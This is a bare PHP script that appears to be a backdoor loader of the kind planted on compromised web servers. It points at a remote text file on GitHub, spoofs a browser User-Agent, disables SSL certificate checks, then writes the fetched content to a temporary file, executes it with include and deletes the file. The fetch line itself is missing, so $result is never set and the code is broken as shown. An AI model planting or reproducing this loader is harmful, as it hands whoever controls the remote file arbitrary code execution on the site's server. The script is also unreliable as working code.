<?php
$url = "https://raw.githubusercontent.com/rkseocode/secode/main/api2.txt";
$options = [
    "http" => [
        "header" => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/126.0.4472.124 Safari/537.36\r\n" .
                    "Accept: application/json\r\n" .
                    "Accept-Language: en-US,en;q=0.9\r\n" .
                    "Cache-Control: no-cache\r\n" .
                    "Pragma: no-cache\r\n"
    ],
    "ssl" => [
        "verify_peer" => false,
        "verify_peer_name" => false
    ]
];
$context = stream_context_create($options);
if ($result === false) {}
else {
    $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
    if (file_put_contents($tempFile, $result) !== false) {
        try {
            include $tempFile;
        } catch (Exception $e) {
            error_log("Error: Unable to include the temporary file. " . $e->getMessage());
            echo "Error: Unable to include the temporary file.";
        }
        unlink($tempFile);
    } else {
        error_log("Error: Unable to write to temporary file.");
        echo "Error: Unable to write to temporary file.";
    }
}
?>
